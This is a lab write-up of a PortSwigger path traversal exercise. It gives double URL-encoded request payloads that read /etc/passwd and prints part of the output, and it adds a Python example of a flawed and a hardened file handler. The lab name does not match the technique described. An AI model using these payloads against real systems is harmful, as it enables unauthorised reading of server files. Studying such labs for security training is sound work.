Breaking Paths & Bypassing Filters: A Journey Through Path Traversal

Ayush Sharma

Introduction

Today, I'm sharing my hands-on adventure through a real-world lab from PortSwigger's Web Security Academy, where I successfully exploited a Path Traversal vulnerability to read the sensitive /etc/passwd file. If you've ever wondered how to sneak past file path filters or what double URL encoding can do for your hacking game, this one's for you.


The Lab Scenario

Lab Name: File path traversal, validation of start of path

In this challenge, the application allowed users to retrieve images from a server via a URL like this: GET /image?filename=smile.jpg

Our goal? Trick the server into reading files outside of the image directory — particularly, the classic Linux file: /etc/passwd.


Understanding Path Traversal

Path traversal (or directory traversal) is a vulnerability that lets an attacker access files and directories that are stored outside the intended folder. This is often achieved using sequences like: ../ (dot dot slash)

These sequences climb up the directory structure — like walking out of a room, going back into the hallway, and sneaking into a locked file room. 🕵️


The Obstacle Course: Filters and Sanitization

Web applications often sanitize user input to prevent attacks. In our case, basic ../ payloads didn’t work:
GET /image?filename=../../../etc/passwd

This resulted in a 400 Bad Request or a response like: "No such file"
That's when I remembered a classic evasion technique: double URL encoding.


The Payload That Broke Through

After trying multiple bypass techniques, I used this payload:
GET /image?filename=%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd

Decoded once, it becomes: %2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
Decoded again, it turns into: ../../../etc/passwd
Boom! The server processed the path and responded with a beautiful dump of the /etc/passwd file:

root:x:0:0:root:/root:/bin/bash
...
peter:x:12001:12001::/home/peter:/bin/bash
academy:x:10000:10000::/academy:/bin/bash

Success!
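
Why the filter missed this, and what a fix looks like, as an added example (not code from the lab or from PortSwigger). BASE_DIR and the function names are assumptions for illustration: the flawed handler filters the value and then URL-decodes it a second time, while the hardened one skips the extra decode and checks where the canonical path actually lands.

```python
import os
from urllib.parse import unquote

BASE_DIR = "/var/www/images"          # assumed image root, not from the lab
ROOT = os.path.realpath(BASE_DIR)
# Payload from the post, as it travels on the wire.
WIRE = "%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd"


def naive_resolve(filename):
    """Flawed pattern: filter on the raw value, then URL-decode again."""
    if "../" in filename or "..\\" in filename:
        return None                    # only catches literal traversal
    decoded = unquote(filename)        # superfluous second decode
    return os.path.normpath(os.path.join(BASE_DIR, decoded))


def safe_resolve(filename):
    """Hardened pattern: no extra decode, canonicalise, check containment."""
    candidate = os.path.realpath(os.path.join(BASE_DIR, filename))
    if os.path.commonpath([ROOT, candidate]) != ROOT:
        return None                    # resolved outside the image root
    return candidate


def demo():
    received = unquote(WIRE)           # the server's normal single decode
    return {
        "received": received,
        "naive": naive_resolve(received),
        "safe_encoded": safe_resolve(received),
        "safe_literal": safe_resolve("../../../etc/passwd"),
        "safe_absolute": safe_resolve("/etc/passwd"),
        "safe_normal": safe_resolve("smile.jpg"),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:14} {value}")
```

With the hardened version the percent-encoded value is treated as a literal (nonexistent) file name inside the image root, so the request ends in a normal "not found" instead of a file read.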


What I Learned

  1. Encoding is your friend: Filters that block ../ might not block %2e%2e%2f, and are even less likely to block double-encoded versions.

  2. Think in layers: If one decoding cycle blocks you, try sneaking in with two.

  3. Automation helps: Burp Intruder is your ally. You can fuzz payloads to see which ones break through.


Tips for Your Own Journey

  • Build a personal payload vault with different encoding formats.

  • Practice decoding manually so you understand the logic.

  • Don’t memorize payloads — memorize strategies.

  • Always test different encoding depths: normal, URL-encoded, double-encoded.


Final Words

This challenge was more than a lab. It was a dance with filters, a battle with encoding, and a moment of triumph when the terminal whispered secrets from /etc/passwd. 🎉

Hack smart. Hack ethically. And always outthink the filter.


~ Xoryush
